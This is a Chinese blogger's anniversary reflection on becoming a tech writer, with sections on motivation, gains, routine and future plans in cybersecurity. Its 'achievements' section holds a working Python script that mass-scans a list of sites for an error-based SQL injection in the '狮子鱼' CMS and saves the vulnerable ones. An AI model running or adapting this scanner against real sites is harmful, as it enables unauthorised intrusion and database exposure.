目录
机缘
回想起最初成为创作者的初心,那是一个偶然的机会。自己在写完一个python实战小项目的过程中,我遇到了很多很多问题,通过与别的前辈交流以及搜索和去看别人的文章,最终找到了解决的方案。这次经历让我意识到分享知识的重要性,也激发了我成为创作者的欲望。我希望通过我的分享,能够帮助到更多像我一样在技术道路上探索的人。
收获
创作的过程是充满挑战和乐趣的。我收获了很多,包括我的文章和分享吸引了一批忠实的粉丝,他们的支持是我继续创作的动力,赞、评论和阅读量以及代码片段分享次数的增长,让我感受到了创作带来的成就感。同时我也认识了一些志同道合的领域同行,他们的见解和经验让我受益匪浅,比并因此让我不断学习和努力追赶,提升自我。
日常
创作已经成为我生活的一部分。在有限的精力下,我学会了如何平衡创作和工作学习,我制定了自己的学习时间与玩乐时间,确保创作和工作学习互不干扰。我会根据重要性和紧急性来安排任务,确保每一项事情都能得到妥善处理。
成就
在过去的创作中,我写下了许多代码与博文,但我认为对我有意义的是我第一次对接触到的第一个漏洞的通刷时写的脚本:
# -*- coding:utf-8 -*-
import requests
import urllib3
urllib3.disable_warnings() # 忽略https证书告警
payload = "/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)"
def POC(url):
target_url = url + payload
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/86.0.4240.111 Safari/537.36",
}
try:
response = requests.get(url=target_url, headers=headers, verify=False, timeout=10)
print("正在测试:", target_url)
if "syntax" in response.text:
print("上述地址存在SQL注入")
return url
except Exception as e:
print("请求失败!")
if __name__ == '__main__':
with open("狮子鱼SQL.txt", "r") as f:
results = f.readlines()
for result in results:
if ("http" or "https") in result:
url = result.strip()
SQL = POC(url)
with open("存在狮子鱼SQL注入.txt", "a+") as f:
if "None" not in str(SQL):
f.write(str(SQL) + "\n")
这段代码不仅解决了我当时的问题,也展示了我的编程能力和逻辑思维。
憧憬
对于未来,我有明确的职业规划和创作规划:
- 职业规划:我希望我能够在网络安全技术领域继续深造,立志成为一名网络安全的技术博主.
- 创作规划:我计划扩大我的创作领域,不仅局限于技术分享,还包括生活感悟和个人成长。
Tips
我很高兴我的文章能够展示在里程碑专区,这对我来说是一种荣誉。我也期待阅读其他创作者的纪念日文章,从中获得灵感和动力。同时,我也希望能够通过我的创作,为读者带来价值,并获得他们的认可和支持。